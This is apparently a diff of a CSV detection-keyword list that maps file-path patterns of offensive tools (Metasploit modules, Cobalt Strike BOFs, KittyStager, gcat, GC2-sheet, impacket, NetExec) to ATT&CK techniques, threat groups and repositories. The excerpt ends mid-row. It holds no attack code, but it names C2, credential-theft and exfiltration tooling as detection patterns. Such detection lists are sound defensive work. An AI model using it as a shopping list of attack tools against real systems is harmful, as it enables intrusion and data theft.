T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/fuzzers/ssh*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/G0ldenGunSec/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/GadgetToJScript.git*","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","10","8","777","157","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" "*/gandcrab.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/ganglia-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/gather/credentials*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/gather/forensics*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/gather/credentials*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/gather/forensics*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/gato/*attack.py*","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","1","N/A","N/A","3","263","24","2023-07-27T15:15:32Z","2023-01-06T15:43:27Z" "*/GC2-sheet/*","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","10","10","449","89","2023-07-06T19:22:36Z","2021-09-15T19:06:12Z" "*/gcat.git*","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","1","N/A","10","10","1300","466","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" "*/gcat.py","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","1","N/A","10","10","1300","466","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" -"*/geacon/*beacon*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","224","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" -"*/geacon_pro*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","224","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" -"*/Gemail-Hack.git*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/Ha3MrX/Gemail-Hack","1","1","N/A","7","9","813","385","2022-02-18T16:12:45Z","2018-04-19T13:48:41Z" +"*/geacon/*beacon*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*/geacon_pro*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*/Gemail-Hack.git*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/Ha3MrX/Gemail-Hack","1","1","N/A","7","9","815","385","2022-02-18T16:12:45Z","2018-04-19T13:48:41Z" "*/GetBrowsers.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*/get-clipboard.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/getLegit/cdnl*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*/getLegit/grkg*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*/getLegit/prvw*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*/getLegit/qhwl*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*/getLegit/tsom*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*/getLegit/zijz*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/get-clipboard.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/get-desc-users.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/getLegit/cdnl*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/getLegit/grkg*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/getLegit/prvw*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/getLegit/qhwl*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/getLegit/tsom*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/getLegit/zijz*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*/get-loggedon/*.c*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*/get-shucking.php*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z" -"*/getST.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/getST.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*/get-system/getsystem.c*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*/GetWebDAVStatus_BOF/*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" -"*/ghidra*","offensive_tool_keyword","ghidra","Ghidra is a software reverse engineering (SRE) framework created and maintained by the National Security Agency Research Directorate. This framework includes a suite of full-featured. high-end software analysis tools that enable users to analyze compiled code on a variety of platforms including Windows. macOS. and Linux. Capabilities include disassembly. assembly. decompilation. graphing. and scripting. along with hundreds of other features. Ghidra supports a wide variety of processor instruction sets and executable formats and can be run in both user-interactive and automated modes. Users may also develop their own Ghidra plug-in components and/or scripts using Java or Python.","T1057 - T1053 - T1564 - T1204 - T1083","TA0002 - TA0011 - TA0008","N/A","N/A","Frameworks","https://github.com/NationalSecurityAgency/ghidra","1","0","N/A","N/A","10","43232","5251","2023-10-01T16:10:19Z","2019-03-01T03:27:48Z" -"*/ghostfile.aspx*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - 